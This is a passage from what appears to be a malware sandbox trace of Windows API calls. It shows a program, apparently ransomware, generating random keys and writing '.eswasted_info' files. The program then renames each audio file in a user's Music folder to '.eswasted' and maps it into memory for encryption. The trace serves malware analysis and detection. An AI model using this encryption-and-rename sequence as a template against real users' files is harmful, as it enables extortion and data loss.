returned 1 [0079.465] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.466] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0079.466] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.466] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.467] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.467] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.476] SetEndOfFile (hFile=0xfc) returned 1 [0079.479] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.479] CloseHandle (hObject=0xfc) returned 1 [0079.546] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb238 | out: hHeap=0x4a0000) returned 1 [0079.546] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0ab0 | out: hHeap=0x4a0000) returned 1 [0079.547] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.548] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.548] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\gTKNHM14wjO.wav") returned 68 [0079.548] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x292) returned 0x4e0c48 [0079.548] lstrcpyW (in: lpString1=0x4e0cd0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.548] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.548] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.549] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.549] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\gTKNHM14wjO.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\gtknhm14wjo.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.550] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.551] SetEndOfFile (hFile=0xfc) returned 1 [0079.551] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.551] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.551] lstrcpyW (in: lpString1=0x4e0cd0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\gTKNHM14wjO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\gtknhm14wjo.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\gTKNHM14wjO.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\gtknhm14wjo.wav.eswasted")) returned 1 [0079.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\gTKNHM14wjO.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\gtknhm14wjo.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.552] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0079.553] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x13a20 [0079.553] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a20) returned 0xb10000 [0079.553] CloseHandle (hObject=0x110) returned 1 [0079.558] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.560] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.560] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.560] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.561] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.561] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.571] SetEndOfFile (hFile=0xfc) returned 1 [0079.574] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.574] CloseHandle (hObject=0xfc) returned 1 [0079.576] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0079.576] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e10d0 | out: hHeap=0x4a0000) returned 1 [0079.576] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.577] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.578] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.578] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\j 5bRIRPkeZCI4Vq.m4a") returned 73 [0079.578] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29c) returned 0x4cb238 [0079.578] lstrcpyW (in: lpString1=0x4cb2ca, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.578] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.578] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.579] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.579] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\j 5bRIRPkeZCI4Vq.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\j 5brirpkezci4vq.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.580] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.581] SetEndOfFile (hFile=0xfc) returned 1 [0079.581] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.581] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.581] lstrcpyW (in: lpString1=0x4cb2ca, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\j 5bRIRPkeZCI4Vq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\j 5brirpkezci4vq.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\j 5bRIRPkeZCI4Vq.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\j 5brirpkezci4vq.m4a.eswasted")) returned 1 [0079.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\j 5bRIRPkeZCI4Vq.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\j 5brirpkezci4vq.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0079.697] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.697] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x168dd [0079.697] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x168dd) returned 0xb10000 [0079.697] CloseHandle (hObject=0x100) returned 1 [0079.702] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.702] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d8da0 | out: pbBuffer=0x4d8da0) returned 1 [0079.702] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.702] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.703] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.703] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.713] SetEndOfFile (hFile=0xfc) returned 1 [0079.718] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0079.718] CloseHandle (hObject=0xfc) returned 1 [0079.719] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb238 | out: hHeap=0x4a0000) returned 1 [0079.719] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e11b8 | out: hHeap=0x4a0000) returned 1 [0079.719] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.720] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.720] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.720] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\sn13.mp3") returned 61 [0079.720] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x284) returned 0x4ef440 [0079.720] lstrcpyW (in: lpString1=0x4ef4ba, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.720] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0079.720] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.721] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0079.721] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\sn13.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\sn13.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.722] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.723] SetEndOfFile (hFile=0xfc) returned 1 [0079.723] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.723] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0079.723] lstrcpyW (in: lpString1=0x4ef4ba, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\sn13.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\sn13.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\sn13.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\sn13.mp3.eswasted")) returned 1 [0079.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\sn13.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\sn13.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.724] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0079.724] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x8fd1 [0079.724] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8fd1) returned 0x2d0000 [0079.724] CloseHandle (hObject=0x118) returned 1 [0079.727] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.728] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d8da0 | out: pbBuffer=0x4d8da0) returned 1 [0079.728] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.728] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.728] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.728] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.737] SetEndOfFile (hFile=0xfc) returned 1 [0079.739] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0079.739] CloseHandle (hObject=0xfc) returned 1 [0079.741] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0079.741] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f22a8 | out: hHeap=0x4a0000) returned 1 [0079.741] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.742] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.742] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.742] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\TjpYEtavwP d5qQo7_i.wav") returned 76 [0079.742] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4ef440 [0079.742] lstrcpyW (in: lpString1=0x4ef4d8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.742] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0079.742] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.743] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0079.743] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\TjpYEtavwP d5qQo7_i.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\tjpyetavwp d5qqo7_i.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.744] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.745] SetEndOfFile (hFile=0xfc) returned 1 [0079.745] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.745] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0079.745] lstrcpyW (in: lpString1=0x4ef4d8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\TjpYEtavwP d5qQo7_i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\tjpyetavwp d5qqo7_i.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\TjpYEtavwP d5qQo7_i.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\tjpyetavwp d5qqo7_i.wav.eswasted")) returned 1 [0079.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\TjpYEtavwP d5qQo7_i.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\tjpyetavwp d5qqo7_i.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0079.746] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.746] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x8430 [0079.746] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8430) returned 0x2d0000 [0079.746] CloseHandle (hObject=0x100) returned 1 [0079.749] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.750] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d8da0 | out: pbBuffer=0x4d8da0) returned 1 [0079.750] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.750] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.751] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.751] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.839] SetEndOfFile (hFile=0xfc) returned 1 [0079.841] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0079.841] CloseHandle (hObject=0xfc) returned 1 [0079.842] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0079.842] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e4e78 | out: hHeap=0x4a0000) returned 1 [0079.842] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.843] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.843] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.843] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\tqOa9fyTbJW.m4a") returned 68 [0079.843] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x292) returned 0x4ef440 [0079.843] lstrcpyW (in: lpString1=0x4ef4c8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.843] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0079.843] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.844] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0079.844] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\tqOa9fyTbJW.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\tqoa9fytbjw.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.845] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.846] SetEndOfFile (hFile=0xfc) returned 1 [0079.846] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.846] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0079.846] lstrcpyW (in: lpString1=0x4ef4c8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\tqOa9fyTbJW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\tqoa9fytbjw.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\tqOa9fyTbJW.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\tqoa9fytbjw.m4a.eswasted")) returned 1 [0079.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\tqOa9fyTbJW.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\tqoa9fytbjw.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.847] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0079.847] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x11385 [0079.847] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11385) returned 0xb10000 [0079.847] CloseHandle (hObject=0x118) returned 1 [0079.851] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.852] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d8da0 | out: pbBuffer=0x4d8da0) returned 1 